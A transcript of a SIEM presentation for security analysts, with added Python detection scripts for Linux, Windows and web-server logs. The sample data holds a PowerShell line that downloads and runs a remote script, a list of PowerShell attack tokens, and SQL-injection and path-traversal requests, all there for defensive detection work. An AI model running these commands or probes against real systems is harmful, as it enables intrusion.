Security Information and Event Management


SIEM implementation presents challenges like high costs and time commitment, but offers benefits in enhancing security processes and preventing cyber threats. A mature SIEM is crucial for a robust security operations center. Explore the necessity of SIEM tools for effective cybersecurity management.

  • SIEM implementation
  • Cybersecurity challenges
  • Security operations center
  • Information security

Uploaded on Mar 12, 2025



Presentation Transcript


  1. Security Information and Event Management
     Craig Pennington, Sr. Network Information Security Analyst, Wabash Valley Power Association, c_pennington@wvpa.com

  2. Show of Hands: Which describes you?
       • Have a SIEM in place
         - Fully implemented, and it is the cornerstone of your SOC
         - Doing lots of good stuff for you, with even more in the works
         - I can't possibly keep up with all the alarms and I wish that thing would just shut up
         - Paid someone else to deal with it and tell me what to do (hosted or on-premise?)
       • Nothing yet, but plan to get one soon
       • Not sure I need one, or too much to deal with right now
       • Other?

  3. To SIEM or not to SIEM

     Challenges
       • Analysts say that for every dollar you spend directly on the SIEM you will spend three more to manage it
       • Requires a lot of planning and a complete understanding of your environment (network, server and workstation levels)
       • Useful implementations require good security processes; the initial work takes a long time and the effort remains ongoing, forever
       • Vendors over-promise and under-deliver
       • Unrealistic expectations of the SIEM being the answer to all your problems

     Benefits
       • The bad guys have the upper hand, and there is too much information to handle with manual processes
       • Verizon's Data Breach Investigations Report has said for several years that 97 percent of attacks could have been prevented with simple security controls, including log management and analysis
       • A mature SOC depends on a mature SIEM implementation
       • Most SIEMs have lots of capabilities and integrations with third-party feeds

  4. My Opinion: YES, you must SIEM
     There is so much information that needs to be analyzed, and so many compliance requirements and due-care standards, that realistically it is impossible to perform it all faithfully without these tools. You are probably already performing most (hopefully at least some) of these activities. Look for ways the SIEM can automate them so you can reclaim at least some of the time it takes to run the SIEM.

  5. Why do People Struggle with SIEMs?
       • Not prepared for the commitment of money and time up front, and for the ongoing needs
       • Don't understand their environment and their needs
         Vikas Bhatia, CEO of the New York-based cyber security consultancy Kalki Consulting: "Almost all vendors want to sell you a big bang approach, but the best way to deploy is a phased approach. It is essential to identify in advance what system log files will be required for monitoring and know what level of security each asset requires."
       • Security is a process and not a one-and-done tactical operation
         Mike Spencer with Accuvant: "Many organizations do not know what their critical assets are and therefore do not know how to protect them."

  6. Features

     Basic Features
       • Event consolidation and normalization
       • Log retention
       • Alerting/correlation
       • Dashboards
       • Reporting

     Advanced Features
       • Threat feeds
       • Compliance
       • Situational awareness
       • User analytics
       • Reduce false positives
       • Packet capture
       • File integrity monitoring
       • Geo-location
       • Workflows
       • Forensic analysis
       • Ticketing
       • Long-term retention

  7. Determine Your Use Cases
       • Gather information on your possible uses:
         - Compliance (control-centric use cases)
         - Threat assessment results and threat lists (threat-centric use cases)
         - Asset lists (asset-centric use cases)
       • Generate a big list of candidate use cases from the information you collect
       • Determine the relevance of the above threats, controls and assets to your specific needs
       • Initially prioritize the use cases on importance AND doability, then prioritize and select the top use cases by their value to you

  8. Compliance Examples

     PCI DSS 10.7: Retain audit trail history for at least one year, with a minimum of three months immediately available for analysis (for example, online, archived, or restorable from backup).

     NERC CIP-007-6 Table R4:
       • 4.1 - Log events at the BES Cyber System level (per BES Cyber System capability) or at the Cyber Asset level (per Cyber Asset capability) for identification of, and after-the-fact investigations of, Cyber Security Incidents that includes, as a minimum, each of the following types of events:
         - 4.1.1. Detected successful login attempts;
         - 4.1.2. Detected failed access attempts and failed login attempts;
         - 4.1.3. Detected malicious code.
       • 4.2 - Generate alerts for security events that the Responsible Entity determines necessitates an alert, that includes, as a minimum, each of the following types of events (per Cyber Asset or BES Cyber System capability):
         - 4.2.1. Detected malicious code from Part 4.1; and
         - 4.2.2. Detected failure of Part 4.1 event logging.
       • 4.3 - Where technically feasible, retain applicable event logs identified in Part 4.1 for at least the last 90 consecutive calendar days except under CIP Exceptional Circumstances.

  9. Choosing a Deployment Model: Outsourced

     Benefits
       • Less training is required
       • Higher level of expertise available
       • Can be more of an operating than a capital expenditure
       • Staff turnover is less of a concern
       • 24/7 analysis

     Concerns
       • Your data leaves the premises
       • Reliance on the Internet in order to manage the network
       • Alarms still need to be investigated
       • Limited visibility into the data for custom or additional analysis
       • Less opportunity to tune out false alarms (the vendor decides what is important)
       • Inability to move between vendors and keep the older logs

  10. Choosing a Deployment Model (cont.): On-Premise

     Benefits
       • Control over your data and system functions
       • Maximum ability to configure the correlation rules, reporting, retention periods and other settings to meet your needs
       • Easier to create custom feeds and input custom IOCs (such as IPs, URLs, etc. from sources like E-ISAC alerts)

     Concerns
       • Tend to suffer from low staffing levels
       • Staff being pulled off SIEM work for projects or other duties (hard to do part-time)
       • Requires specialized training
       • Often oversized versus actual needs

  11. Sizing the SIEM
       • Avoid playing feature bingo: compare the features your use cases require to the features of each product
       • Look for the ability to deploy an evaluation or a proof of concept in your environment
       • Licensed by endpoint or by message volume?
       • If hosted, are there additional costs for the volume of storage needed to satisfy your retention requirements?
       • If you only need basic features like log correlation and reporting, don't pay for advanced enterprise features
       • Do you require redundancy?
       • How does the system scale? Do I have to throw away existing hardware investment if I need to scale up?

  12. Questions To Ask SIEM Vendors
       • What log sources does it handle out of the box? How do you create custom maps?
       • What out-of-the-box reports for security and compliance are included?
       • What is the cost of maintenance?
       • What is the cost of the SIEM product? How is it licensed?
       • What is the cost of training?
       • How is post-sale technical support handled? Stats? (time to first contact, ticket priorities, average time to resolution)
       • Does it require hardware? Does it support virtualization? Hybrid?
       • Will it integrate with your current ticketing system?
       • How much report/dashboard/alert customization is available?

  13. Questions To Ask SIEM Vendors (cont.)
       • How will it help with operational roles and not just security?
       • Is there a packet capture or flow option?
       • How does the product handle older data that has been archived off-box?
       • How thorough is the product documentation?
       • What does the product do in the event of a license violation?
       • How much staffing will I need for a deployment of this size?

  14. Your SIEM Uses Versus What's Built-in (figure)

  15. The Path to SIEM Success
       • Collect logs from standard security sources (firewalls, IPS, domain controllers, anti-virus/anti-malware, NetFlow, web proxy, etc.)
       • Enrich logs with supplemental data (vulnerabilities, software versions, etc.) and global threat intelligence feeds
       • Correlate - find the proverbial needles in the log haystacks
       • Investigate - follow up on and fix data source and normalization issues
       • Document - standard operating procedures, service level agreements, forensics/investigation procedures
       • Incorporate - expanded log collection (more servers, workstations) and additional uses such as application monitoring and analysis
       • Continuously improve your processes

  16. Gartner Magic Quadrant (figure)

  17. A SIEM can help with the CIS Critical Security Controls
       • CSC 1: Inventory of Authorized and Unauthorized Devices
       • CSC 5: Controlled Use of Administrative Privileges
       • CSC 6: Maintenance, Monitoring, and Analysis of Audit Logs
       • CSC 9: Limitation and Control of Network Ports, Protocols, and Services
       • CSC 11: Secure Configurations for Network Devices such as Firewalls, Routers, and Switches
       • CSC 14: Controlled Access Based on the Need to Know
       • CSC 16: Account Monitoring and Control
       • CSC 18: Application Software Security
       • CSC 19: Incident Response and Management

  18. What to Look for on Linux
       • Successful user login: "Accepted password", "Accepted publickey", "session opened"
       • Failed user login: "authentication failure", "Failed password"
       • User log-off: "session closed"
       • User account change or deletion: "delete user", "password changed", "new user"
       • Sudo actions: "sudo: COMMAND=", "FAILED su"
       • Service failure: "failed" or "failure"
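     The strings above only become useful once the SIEM normalizes each line into an event and then correlates events across lines (the "needles in the haystack" step from slide 15). The following is an added example, not code from the presentation: it normalizes a constructed auth.log excerpt with the slide's search strings and raises one alert when a successful login follows several failures from the same source. The sample log, the 2025 year stamp, the five-minute window and the threshold of three failures are all assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed /var/log/auth.log excerpt (sample data, not from the presentation).
SAMPLE_AUTH_LOG = """\
Mar 12 10:01:01 web01 sshd[2101]: Failed password for invalid user admin from 198.51.100.23 port 40112 ssh2
Mar 12 10:01:03 web01 sshd[2103]: Failed password for root from 198.51.100.23 port 40114 ssh2
Mar 12 10:01:05 web01 sshd[2105]: Failed password for root from 198.51.100.23 port 40116 ssh2
Mar 12 10:01:06 web01 sshd[2107]: Failed password for root from 198.51.100.23 port 40118 ssh2
Mar 12 10:01:08 web01 sshd[2109]: Accepted password for root from 198.51.100.23 port 40120 ssh2
Mar 12 10:01:08 web01 sshd[2109]: pam_unix(sshd:session): session opened for user root by (uid=0)
Mar 12 10:02:30 web01 sshd[2201]: Accepted publickey for deploy from 10.0.0.5 port 51000 ssh2: RSA SHA256:k9s...
Mar 12 10:03:00 web01 sudo:   deploy : TTY=pts/0 ; PWD=/home/deploy ; USER=root ; COMMAND=/usr/bin/systemctl restart nginx
Mar 12 10:03:10 web01 su[2250]: FAILED su for root by deploy
Mar 12 10:04:00 web01 useradd[2260]: new user: name=svc_backup, UID=1002, GID=1002, home=/home/svc_backup, shell=/bin/bash
"""

# Syslog header: "Mon DD HH:MM:SS host program[pid]: message"
SYSLOG_HEAD = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} {1,2}\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) (?P<proc>[^\[:]+)(?:\[\d+\])?: (?P<msg>.*)$"
)

# Normalization rules built from the strings the slide says to look for. Order matters
# (first match wins), so the specific patterns come before the generic ones.
PATTERNS = [
    ("login_success", re.compile(r"Accepted (?P<method>password|publickey) for (?P<user>\S+) from (?P<src>\S+)")),
    ("login_failure", re.compile(r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+)")),
    ("login_failure", re.compile(r"authentication failure;.*\brhost=(?P<src>\S*).*\buser=(?P<user>\S*)")),
    ("session_open", re.compile(r"session opened for user (?P<user>\S+)")),
    ("session_close", re.compile(r"session closed for user (?P<user>\S+)")),
    ("sudo_command", re.compile(r"sudo:\s+(?P<user>\S+) : .*COMMAND=(?P<command>.+)$")),
    ("su_failure", re.compile(r"FAILED su for (?P<target>\S+) by (?P<user>\S+)")),
    ("account_change", re.compile(r"(?P<action>new user|delete user|password changed)(?:: name=(?P<user>[^,]+))?")),
]


def normalize(line, year=2025):
    """Turn one syslog line into a normalized event dict, or None if it is not syslog shaped."""
    head = SYSLOG_HEAD.match(line)
    if not head:
        return None
    # Syslog timestamps carry no year; the caller supplies it (assumed 2025 for the sample).
    ts = datetime.strptime(f"{year} {head['ts']}", "%Y %b %d %H:%M:%S")
    event = {"ts": ts, "host": head["host"], "proc": head["proc"], "event": "other", "raw": head["msg"]}
    for name, pattern in PATTERNS:
        hit = pattern.search(line)
        if hit:
            event["event"] = name
            event.update({k: v for k, v in hit.groupdict().items() if v is not None})
            break
    return event


def correlate(events, threshold=3, window=timedelta(minutes=5)):
    """Flag a successful login preceded by >= threshold failures from the same source inside the window.

    No single line here is alarming on its own; only the sequence is.
    """
    failures = defaultdict(list)  # source IP -> timestamps of failed logins
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["event"] == "login_failure" and ev.get("src"):
            failures[ev["src"]].append(ev["ts"])
        elif ev["event"] == "login_success":
            recent = [t for t in failures.get(ev["src"], []) if ev["ts"] - t <= window]
            if len(recent) >= threshold:
                alerts.append({"rule": "brute_force_then_success", "host": ev["host"], "src": ev["src"],
                               "user": ev["user"], "failures": len(recent), "ts": ev["ts"]})
    return alerts


def triage(log_text):
    """Normalize a log excerpt, then return correlated alerts plus single events worth a human look."""
    events = [e for e in (normalize(l) for l in log_text.splitlines()) if e is not None]
    review = [e for e in events if e["event"] in ("account_change", "su_failure", "sudo_command")]
    return {"events": events, "alerts": correlate(events), "review": review}


if __name__ == "__main__":
    result = triage(SAMPLE_AUTH_LOG)
    for a in result["alerts"]:
        print("ALERT", a)
    for e in result["review"]:
        print("REVIEW", e["event"], e.get("user"), e.get("command") or e.get("action") or e.get("target"))
```

     Two things the slide's keyword list does not show: the failure lines are only interesting relative to the success that follows them, and the sudo, su and account-change events are not alarms at all but items to review, so the script keeps them in a separate queue instead of alerting on each one.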

  19. Top Windows 10 Event IDs to Monitor and Alarm on (according to MalwareArchaeology.com)
       • 4688 - New process. Look for commonly abused built-in and admin tools such as cscript.exe, sysprep.exe, nmap.exe, nbtstat.exe, netstat.exe, ssh.exe, psexec.exe, psexecsvc.exe, ipconfig.exe, ping.exe, powershell.exe, or new, odd .exe's
       • 4624 - An account logged on. What is normal?
       • 5140 - A share was accessed. Most likely they connected to the C$ share
       • 5156 - Windows Filtering Platform (firewall) permitted a network connection, by process. Shows the process connecting to an IP that you can resolve with GeoIP to country, region and city
       • 7040 - A service's start type was changed. Static systems don't change details of services
       • 7045 - A new service was installed. Static systems don't get new services except at patch time and new installs
       • 4663 - File access. File auditing must be enabled on the directories you want to monitor
       • 4657 - Registry value modified. Registry auditing gives more registry detail than 4663 for registry items
       • 501 - PowerShell execution (classic Windows PowerShell log)
       • 4104 - PowerShell script block logging
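     Most of these IDs are noisy on their own; the slide's "what is normal?" and "static systems don't change" remarks point at baselining rather than keyword matching. The following is an added example, not code from the presentation or from MalwareArchaeology: it takes already-parsed events (constructed, with flattened field names instead of the real nested EventData XML) and decides which ones deserve an alarm. The trusted directories, service baseline, permitted RDP source and PowerShell token list are assumptions that you would replace with your own environment's values.

```python
import ntpath

# Image names from the slide's 4688 list: legitimate admin tools that intruders also lean on.
# The slide writes "psexecsvc.exe"; the PsExec service binary on disk is PSEXESVC.exe, so both are listed.
COMMONLY_ABUSED = {
    "cscript.exe", "sysprep.exe", "nmap.exe", "nbtstat.exe", "netstat.exe", "ssh.exe",
    "psexec.exe", "psexecsvc.exe", "psexesvc.exe", "ipconfig.exe", "ping.exe", "powershell.exe",
}
# Assumption: an .exe launched from outside these directories counts as a "new odd .exe".
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Assumption: services expected on this static server build; any other 7045 is a new service.
SERVICE_BASELINE = {"Spooler", "WinDefend", "LanmanServer", "Dhcp"}
# Assumption: the only host that should open RDP (4624 logon type 10) to servers.
ADMIN_RDP_SOURCES = {"10.0.0.5"}
# Tokens that rarely appear in legitimate administrative script blocks (4104). Substring matching
# is deliberately crude ("IEX" will also hit inside longer words); tune to your own scripts.
PS_SUSPICIOUS = ("-EncodedCommand", "FromBase64String", "DownloadString", "IEX", "Invoke-Expression", "-w hidden")

# Constructed sample events (not real telemetry); field names are flattened for readability.
SAMPLE_EVENTS = [
    {"EventID": 4688, "Computer": "FS01", "SubjectUserName": "svc_backup", "NewProcessName": "C:\\Windows\\System32\\ipconfig.exe"},
    {"EventID": 4688, "Computer": "FS01", "SubjectUserName": "jdoe", "NewProcessName": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\update.exe"},
    {"EventID": 4688, "Computer": "WS07", "SubjectUserName": "jdoe", "NewProcessName": "C:\\Program Files\\Mozilla Firefox\\firefox.exe"},
    {"EventID": 4624, "Computer": "FS01", "TargetUserName": "admin", "LogonType": 10, "IpAddress": "10.0.0.5"},
    {"EventID": 4624, "Computer": "FS01", "TargetUserName": "admin", "LogonType": 10, "IpAddress": "10.0.7.44"},
    {"EventID": 5140, "Computer": "FS01", "SubjectUserName": "admin", "IpAddress": "10.0.7.44", "ShareName": "\\\\*\\C$"},
    {"EventID": 5140, "Computer": "FS01", "SubjectUserName": "jdoe", "IpAddress": "10.0.7.10", "ShareName": "\\\\*\\Public"},
    {"EventID": 7045, "Computer": "FS01", "ServiceName": "Spooler", "ImagePath": "C:\\Windows\\System32\\spoolsv.exe"},
    {"EventID": 7045, "Computer": "FS01", "ServiceName": "PSEXESVC", "ImagePath": "%SystemRoot%\\PSEXESVC.exe"},
    {"EventID": 7040, "Computer": "FS01", "ServiceName": "WinDefend", "OldStartType": "auto start", "NewStartType": "disabled"},
    {"EventID": 4104, "Computer": "WS07", "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"},
    {"EventID": 4104, "Computer": "WS07", "ScriptBlockText": "Get-Service | Where-Object Status -eq 'Running'"},
]


def triage_event(ev, service_baseline=SERVICE_BASELINE):
    """Return (severity, message) for an event worth alarming on, or None to let it pass."""
    eid = ev["EventID"]
    if eid == 4688:
        image = ev["NewProcessName"]
        base = ntpath.basename(image).lower()
        if base in COMMONLY_ABUSED:
            return ("medium", f"4688 {base} started by {ev['SubjectUserName']} on {ev['Computer']}")
        if not image.lower().startswith(TRUSTED_DIRS):
            return ("high", f"4688 executable outside trusted directories: {image}")
    elif eid == 4624:
        # Logon type 10 = RemoteInteractive (RDP); anything not from the admin host is "not normal".
        if ev["LogonType"] == 10 and ev["IpAddress"] not in ADMIN_RDP_SOURCES:
            return ("medium", f"4624 RDP logon for {ev['TargetUserName']} from unexpected host {ev['IpAddress']}")
    elif eid == 5140:
        share = ev["ShareName"].rsplit("\\", 1)[-1]  # "\\*\C$" -> "C$"
        if share.endswith("$") and share.upper() != "IPC$":
            return ("high", f"5140 admin share {share} opened by {ev['SubjectUserName']} from {ev['IpAddress']}")
    elif eid == 7045:
        if ev["ServiceName"] not in service_baseline:
            return ("high", f"7045 new service {ev['ServiceName']} -> {ev['ImagePath']}")
    elif eid == 7040:
        return ("medium", f"7040 {ev['ServiceName']} start type changed {ev['OldStartType']} -> {ev['NewStartType']}")
    elif eid == 4104:
        text = ev["ScriptBlockText"].lower()
        hits = [tok for tok in PS_SUSPICIOUS if tok.lower() in text]
        if hits:
            return ("high", f"4104 script block on {ev['Computer']} contains {', '.join(hits)}")
    return None


def triage(events):
    """Run every event through the rules and return (severity, message, event_id) alerts in arrival order."""
    alerts = []
    for ev in events:
        verdict = triage_event(ev)
        if verdict:
            alerts.append((verdict[0], verdict[1], ev["EventID"]))
    return alerts


if __name__ == "__main__":
    for severity, message, eid in triage(SAMPLE_EVENTS):
        print(f"[{severity:6}] {message}")
```

     On the sample, five of the twelve events pass silently: the browser launch, the RDP logon from the admin host, the non-admin share, the baseline service and the ordinary PowerShell pipeline. That suppression is the point of the exercise; an analyst who is paged on every 4624 and 4688 will soon wish, as slide 2 puts it, that the thing would just shut up.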

  20. What to Look for on Cisco ASA
       • Traffic allowed on firewall: "Built connection", "access-list permitted"
       • Traffic blocked on firewall: "access-list denied", "deny inbound", "Deny by"
       • Bytes transferred (large files?): "Teardown TCP connection duration bytes"
       • Bandwidth and protocol usage: "limit exceeded", "CPU utilization"
       • Detected attack activity: "attack from"
       • User account changes: "user added", "user deleted", "User priv level changed"
       • Administrator access: "AAA user", "User locked out", "login failed"

  21. What to Look for on Web Servers
       • Excessive access attempts to non-existent files
       • Code (SQL, HTML) seen as part of the URL
       • Access to extensions you have not implemented
       • Web service stopped/started/failed messages
       • Access to risky pages that accept user input
       • Look at the logs on all servers in the load-balancer pool
       • Status code 200 on files that are not yours
       • Failed user authentication: status codes 401, 403
       • Invalid request: status code 400
       • Internal server error: status code 500
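     The web-server indicators above are the easiest to turn into rules, with one caveat the slide does not spell out: attackers URL-encode their payloads, so "code in the URL" has to be checked after decoding. The following is an added example, not code from the presentation: it parses a constructed combined-format access log and applies the slide's rules (404 bursts, injection or traversal markers in the decoded target, serving an extension the site does not implement, and the 400/401/403/5xx status codes). The sample lines, the extension allow-list and the burst threshold are assumptions.

```python
import posixpath
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote, urlsplit

# Constructed Apache/nginx combined-format lines (sample data, not from the presentation).
SAMPLE_ACCESS_LOG = """\
203.0.113.9 - - [12/Mar/2025:10:15:01 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Mar/2025:10:15:02 +0000] "GET /static/app.js HTTP/1.1" 200 8810 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2025:10:16:00 +0000] "GET /admin.php HTTP/1.1" 404 210 "-" "curl/8.0"
198.51.100.7 - - [12/Mar/2025:10:16:01 +0000] "GET /wp-login.php HTTP/1.1" 404 210 "-" "curl/8.0"
198.51.100.7 - - [12/Mar/2025:10:16:02 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 210 "-" "curl/8.0"
198.51.100.7 - - [12/Mar/2025:10:16:03 +0000] "GET /.env HTTP/1.1" 404 210 "-" "curl/8.0"
198.51.100.7 - - [12/Mar/2025:10:16:04 +0000] "GET /backup.zip HTTP/1.1" 404 210 "-" "curl/8.0"
198.51.100.7 - - [12/Mar/2025:10:16:30 +0000] "GET /search?q=%27%20OR%201%3D1%20-- HTTP/1.1" 200 3300 "-" "curl/8.0"
192.0.2.44 - - [12/Mar/2025:10:17:10 +0000] "GET /files/..%2F..%2Fetc/passwd HTTP/1.1" 400 150 "-" "python-requests/2.31"
192.0.2.44 - - [12/Mar/2025:10:17:20 +0000] "GET /uploads/shell.php HTTP/1.1" 200 740 "-" "python-requests/2.31"
203.0.113.9 - - [12/Mar/2025:10:18:00 +0000] "POST /login HTTP/1.1" 401 90 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Mar/2025:10:18:05 +0000] "GET /api/orders HTTP/1.1" 500 60 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Assumption: this site only serves these extensions ("" covers extensionless routes like /login).
IMPLEMENTED_EXTENSIONS = {"", ".html", ".css", ".js", ".png", ".ico"}

# Injection and traversal markers, checked against the URL-decoded request target.
CODE_IN_URL = [
    ("sql", re.compile(r"(?:'|\")\s*(?:or|and)\b|\bunion\b.*\bselect\b|\bsleep\s*\(", re.I)),
    ("html", re.compile(r"<\s*(?:script|img|iframe)\b", re.I)),
    ("traversal", re.compile(r"(?:^|/)\.\.(?:/|$)")),
]


def parse(line):
    """Parse one combined-format line into a dict with a decoded path and query, or None on no match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    parts = urlsplit(rec["target"])
    # Decode after splitting so an encoded "/" (%2F) cannot hide a traversal from the path check.
    rec["path"] = unquote(parts.path)
    rec["query"] = unquote(parts.query)
    return rec


def analyze(log_text, burst_threshold=5, burst_window=timedelta(seconds=60)):
    """Apply the slide's web-server rules and return (rule, client_ip, detail) alerts in log order."""
    alerts = []
    not_found = defaultdict(list)  # client IP -> recent 404 timestamps
    bursted = set()                # clients already alerted for a 404 burst
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ip, status, path = rec["ip"], rec["status"], rec["path"]
        decoded = path + ("?" + rec["query"] if rec["query"] else "")
        for kind, pattern in CODE_IN_URL:
            if pattern.search(decoded):
                alerts.append(("code_in_url", ip, f"{kind}: {decoded}"))
                break
        ext = posixpath.splitext(path)[1].lower()
        if status < 400 and ext not in IMPLEMENTED_EXTENSIONS:
            alerts.append(("unexpected_extension_served", ip, f"{status} {path}"))
        if status == 404:
            window = [t for t in not_found[ip] if rec["ts"] - t <= burst_window] + [rec["ts"]]
            not_found[ip] = window
            if len(window) >= burst_threshold and ip not in bursted:
                bursted.add(ip)
                alerts.append(("not_found_burst", ip, f"{len(window)} missing files in {burst_window.seconds}s"))
        elif status in (401, 403):
            alerts.append(("auth_failure", ip, f"{status} {rec['method']} {path}"))
        elif status == 400:
            alerts.append(("invalid_request", ip, rec["target"]))
        elif status >= 500:
            alerts.append(("server_error", ip, f"{status} {path}"))
    return alerts


if __name__ == "__main__":
    for rule, ip, detail in analyze(SAMPLE_ACCESS_LOG):
        print(f"{rule:28} {ip:14} {detail}")
```

     The 404 scan is reported once per client rather than once per line, which is the difference between one alarm and five for the same probe, and the "unexpected extension" rule fires only on responses that were actually served: a 404 for /admin.php is reconnaissance already covered by the burst rule, while a 200 for /uploads/shell.php is the slide's "200 on files that are not yours".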

  22. A Few Informational Sites
       • NRECA Managed Cybersecurity Services Provider List - http://newsletters.email.nreca.org/c/19p1ImXIAyFpetrhuOiTycmVZ
       • Ultimatewindowssecurity.com
         - Windows Security Log Quick Reference Guide - https://www.ultimatewindowssecurity.com/securitylog/quickref/downloads/quickref.zip
         - Windows Security Log Events Encyclopedia - http://www.ultimatewindowssecurity.com/securitylog/encyclopedia/Default.aspx
       • Windows event ID lookup - www.eventid.net
       • Petri.com, Monitoring Windows Event Logs for Security Breaches - https://www.petri.com/monitoring-windows-event-logs-for-security-breaches
       • SANS Reading Room - https://www.sans.org/reading-room/whitepapers/forensics/windows-logon-forensics-34132
       • Information Assurance Directorate - iad.gov (lots of secure configuration advice in the Library)
         - Spotting the Adversary with Windows Event Log Monitoring - https://www.iad.gov/iad/library/ia-guidance/security-configuration/applications/spotting-the-adversary-with-windows-event-log-monitoring.cfm
         - Assess the Mess - https://www.iad.gov/iad/library/ia-guidance/security-configuration/industrial-control-systems/assess-the-mess.cfm

  23. A Few Informational Sites (cont.)
       • IASE, Information Assurance Support Environment - iase.disa.mil
         - Security Technical Implementation Guides (STIGs) - https://iase.disa.mil/stigs/Pages/index.aspx
       • MalwareArchaeology.com
         - Windows Logging Cheat Sheets - https://www.malwarearchaeology.com/cheat-sheets
         - Presentation from the 2015 Splunk Conference, Finding Advanced Attacks and Malware With Only 6 Windows EventIDs - https://conf.splunk.com/session/2015/conf2015_MGough_MalwareArchaelogy_SecurityCompliance_FindingAdvnacedAttacksAnd.pdf
       • Australian Government Department of Defence, Australian Signals Directorate - https://www.asd.gov.au/
       • Critical Log Review Checklist for Security Incidents - https://zeltser.com/security-incident-log-review-checklist/
       • Identity and Access in Windows Server 2016, Appendix L: Events to Monitor - https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/appendix-l--events-to-monitor
       • Log analysis references - www.loganalysis.org

  24. Q&A
